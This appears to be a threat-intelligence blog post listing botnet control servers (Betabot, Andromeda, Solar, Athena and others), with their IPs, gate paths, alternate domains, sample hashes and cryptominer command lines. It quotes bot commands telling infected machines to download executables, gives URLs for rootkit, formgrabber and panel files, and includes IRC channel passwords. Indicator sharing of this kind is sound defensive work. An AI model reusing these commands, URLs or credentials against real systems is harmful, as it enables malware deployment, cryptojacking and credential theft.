Resolved illuminati.sx to 109.236.80.74
Server: illuminati.sx
Gate file: /http/gate.php
This is the first time I have seen the HTTP version of plasma and it sucks hard. It seems to be a slightly upgraded version of the old barracuda HTTP bot, with few of the problems fixed.
Hosting info: http://whois.domaintools.com/109.236.80.74
Bitcoin mining info: miner.start http://109.236.80.74/miner/CPUMiner.files *-a
meziamussucemaqueue.su (Betabot http botnet hosted by sunnyvision.com)
Resolved meziamussucemaqueue.su to 124.248.205.104
Server: meziamussucemaqueue.su
Gate file: /phpmiadmin/order.php
Alternate domain: umbxd15896.su
Bitcoin mining info: -o http://ypool.net:8080 -u Teolous.PTS_1 -p x
Hosting info: http://whois.domaintools.com/124.248.205.104
Related md5s (download samples from malwr.com):
Betabot: 670fa0a15754e1d67810eea73e890dad
Bitcoin miner: e1aed5a5d729d37efca73602d8bc66e9
Bitcoin miner 2: a92403926113dd4b3a4d3e4c48eace66
EDIT: new mining info: stratum+tcp://pool.d2.cc:3335 -u Hanito.bot -p 3fcua4
www.paloshke.org (Solar http botnet hosted by gandi.net)
Resolved www.paloshke.org to 46.226.108.231
Server: www.paloshke.org
Gate file: /index.php
Alternate domains: www.bkcn.su www.cahlr.com www.rahmea.org www.businet.su www.oscdfg.org www.monero.org www.webres.su www.uwtriv.com www.zmvnue.org www.oreape.com www.xnighs.su www.dvmnib.com www.itmcff.org www.akwrzv.com www.ivmqzc.org www.duvema.com www.mtwogp.org www.hielah.com www.apdekt.org
Bitcoin mining info: -a scrypt -s 20 --no-longpoll -q -o www2.oskefi.org:443 -u anonymous.1 -p -x
Hosting info: http://whois.domaintools.com/46.226.108.231
Related md5s:
Solar: eafe8ed59f752d7ae8240f3cdbc698f6
sentryme.com (Betabot http botnet hosted by ecatel.net)
Resolved sentryme.com to 94.102.51.123
Server: sentryme.com
Gate file: /order.php
Alternate domain: stayattentive.com
Bitcoin mining info (two miner command lines):
-a sha256 -o stratum+tcp://162.243.6.88:3333 -u Ghettoweed.R -p x -g no -t 4
-a sha256 -o stratum+tcp://162.243.6.88:3333 -u Ghettoweed.R -p x -t 0 -I 10
The username string in the binary is the sky daddy_v1$, which corresponds to this Hackforums account.
adobe-helper.cloudapp.net (Andromeda http botnet hosted by microsoft.com)
Resolved adobe-helper.cloudapp.net to 168.63.166.85
Server: adobe-helper.cloudapp.net
Gate file: /updates/gate.php
It downloads a bitcoin miner and begins mining using this proxy, also hosted on the Windows cloud: hxxp://updating-flash6.cloudapp.net
Bonus Andromeda 2.7 panel here: hxxp://adobe-helper.cloudapp.net/panel.zip
Hosting info: http://whois.domaintools.com/168.63.166.85
Related md5s (search on malwr.com to download samples):
Andromeda: 2fd21454a5c17fcfffef9f900dec1434
ns1.androha.com (Andromeda http botnet hosted by namecheap.com)
Resolved ns1.androha.com to 162.213.250.141
Server: ns1.androha.com
Gate file: /cgi/image.php
Plugins:
Rootkit: hxxp://ns1.androha.com/cgi/r.pack
Socks: hxxp://ns1.androha.com/cgi/s.pack
Formgrabber: hxxp://ns1.androha.com/cgi/f.pack (gate file: /cgi/fg.php)
First cracked Andromeda I've seen in a while.
Hosting info: http://whois.domaintools.com/162.213.250.141
Related md5s (search on malwr.com to download the sample):
Andromeda: c5598dd742b5504084779ccfda0b207c
thebankslife.no-ip.biz (Athena irc botnet hosted by shellxnet.com)
Resolved thebankslife.no-ip.biz to 72.20.28.232
Server: thebankslife.no-ip.biz
Port: 6667
Channel list (channel, users, modes, topic):
#sexlyfe   2   [+nt]
#Syncrude  78  [+sntVCT]  !download hxxp://nassau03.nl/russiabm.exe 5
#bankslife 35  [+nt]      .gtfo
Channel: #Syncrude
Now talking on #Syncrude
Topic for #Syncrude is: !download hxxp://nassau03.nl/russiabm.exe 5
Topic for #Syncrude set by test (Fri Aug 09 00:17:01 2013)
Bitcoin mining info: macromedia.exe" -a scrypt -o
bitcoinglobalbanking.com (Betabot http botnet hosted by leaseweb.com)
Resolved bitcoinglobalbanking.com to 82.192.92.5
Server: bitcoinglobalbanking.com
Gate file: /b/order.php
Alternate domain: bitcointradingdepot.com
This botnet wasn't actually mining bitcoins when I checked it. I'm very surprised.
Hosting info: http://whois.domaintools.com/82.192.92.5
Related md5s (search on malwr.com to download the samples):
Betabot: bbfdbd53810751401b720641687a6116
EDIT: It finally started bitcoin mining.
Mining info: macromedia.exe" -a scrypt -o http://mine.pool-x.eu:8080 -u jc2244.cr
y.osej36.com (Irc botnet hosted by gandi.net)
Resolved y.osej36.com to 92.243.8.222
Server: y.osej36.com
Port: 80
Server password: passwd
Channel: #root
Channel password: redem
Bot commands seen in the channel:
!NAZEL hxxp://www12.0zz0.com/2013/06/21/20/723860853.png a392564eae140562e4b27d0ab078ba1e
!NAZEL hxxp://upload.tehran98.com/img1/9kxogpyfckk2xwuzzn6j.png a392564eae140562e4b27d0ab078ba1e
!s -n
A modified ircd is used, so you may have trouble connecting.
Alternate domains: y.v23sdy.com y.rwt234.com
Bitcoin mining info: minerd.exe -a scrypt -s 20 --no-longpoll -q -o za.oisdj.com:443 -u anonymous.1 -p -x
s5.6d6f6e65797072696e746572.com (Betabot http botnet hosted by infiumhost.com)
Resolved s5.6d6f6e65797072696e746572.com to 188.190.127.160
Server: s5.6d6f6e65797072696e746572.com
Gate file: /wp-admin/order.php
Alternate domains: ripraktec147.com youdbeproud228.com wyomiriding928.com
Mining info: svchost.exe' -I 100 -T 200 -t 2 -o stratum+tcp://s2.6d6f6e65797072696e746572.com:3333 -u mp187.her -p lex
Hosting info: http://whois.domaintools.com/188.190.127.160
Related md5s (search on malwr.com to download the samples):
Betabot: db9a816d58899f1ba92bc338e89f856a